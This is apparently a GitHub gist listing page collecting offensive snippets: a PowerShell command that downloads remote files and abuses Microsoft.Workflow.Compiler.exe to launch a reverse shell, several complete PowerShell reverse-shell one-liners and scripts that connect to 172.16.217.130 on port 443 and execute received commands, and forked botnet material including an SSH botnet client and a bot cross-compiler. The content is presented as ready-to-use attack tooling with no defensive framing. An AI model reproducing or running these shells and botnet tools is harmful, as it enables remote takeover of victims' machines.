Bart Black reanimat0r
reanimat0r
/ PowerShell_Command.txt
Created
October 13, 2020 14:00
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 64bit: | |
| powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell | |
| 32bit: | |
| powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Net.Sockets; | |
reanimat0r
/ oneline_rev_shell_1.txt
Created
October 13, 2020 13:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $client = New-Object System.Net.Sockets.TCPClient('172.16.217.130',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
reanimat0r
/ oneline_rev_shell_2.txt
Created
October 13, 2020 13:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $sm=(New-Object Net.Sockets.TCPClient('172.16.217.130',443)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} |
reanimat0r
/ Simple_Rev_Shell.ps1
Created
October 13, 2020 13:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient("172.16.217.130",443); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do{ | |
| $writer.Write("[Bank_Security]> "); | |
| $writer.Flush(); | |
| $read = $null; |
reanimat0r
/ Simple_Rev_Shell_2.ps1
Created
October 13, 2020 13:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $client = New-Object System.Net.Sockets.TCPClient('172.16.217.130',443); | |
| $stream = $client.GetStream(); | |
| [byte[]]$bytes = 0..65535|%{0}; | |
| while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; | |
| $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); | |
| $sendback = (iex $data 2>&1 | Out-String); | |
| $result = $sendback + 'PS '+ (pwd).Path + '> '; | |
| $sendbyte = ([text.encoding]::ASCII).GetBytes($result); | |
| $stream.Write($sendbyte,0,$sendbyte.Length); | |
| $stream.Flush() |
reanimat0r
/ Simple_Rev_Shell_3.ps1
Created
October 13, 2020 13:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function cln{if($c.Connected -eq $true){$c.Close()}; | |
| if($p.ExitCode -ne $null){$p.Close()}; | |
| exit | |
| }; | |
| $c=New-Object System.Net.Sockets.TcpClient; | |
| $c.Connect('172.16.217.130',443); | |
| if($c.Connected -ne $true){cln}; | |
| $s=$c.GetStream(); | |
| $b=New-Object System.Byte[] $c.ReceiveBufferSize; | |
| $p=New-Object System.Diagnostics.Process; |
reanimat0r
/ index.html
Created
June 22, 2020 18:16
— forked from Jihadi4Prez/index.html
Boatnet.us - Source Code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE HTML PUBLIC> | |
| <!-- This might not be the pretties code ever but fuck it --> | |
| <!-- This is going to be public on my github - https://www.github.com/Jihadi4prez | |
| <html> | |
| <head> | |
| <!-- Search Paramiters--> | |
| <meta charset="utf-8"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=edge"> |
reanimat0r
/ cc7.py
Created
June 22, 2020 18:15
— forked from Jihadi4Prez/cc7.py
Python Cross-Compiler
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Python cross-compiler | |
| #uclibc ever down? No worrys I gottcha fam. | |
| import subprocess, sys | |
| if len(sys.argv[2]) != 0: | |
| ip = sys.argv[2] | |
| else: | |
| print("\x1b[0;31mIncorrect Usage!") | |
| print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDRESS> \x1b[0m") |
reanimat0r
/ botnet.py
Created
June 19, 2020 21:09
— forked from lava9868/botnet.py
botnet in python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # basic ssh botnet | |
| import pxssh #calling pxssh module | |
| class Client: #defining class with name client | |
| def_init_(self,host,user,password): | |
| self.host = host | |
| self.user=user | |
| self.password = password | |
| self.session = self.connect() # for ssh session | |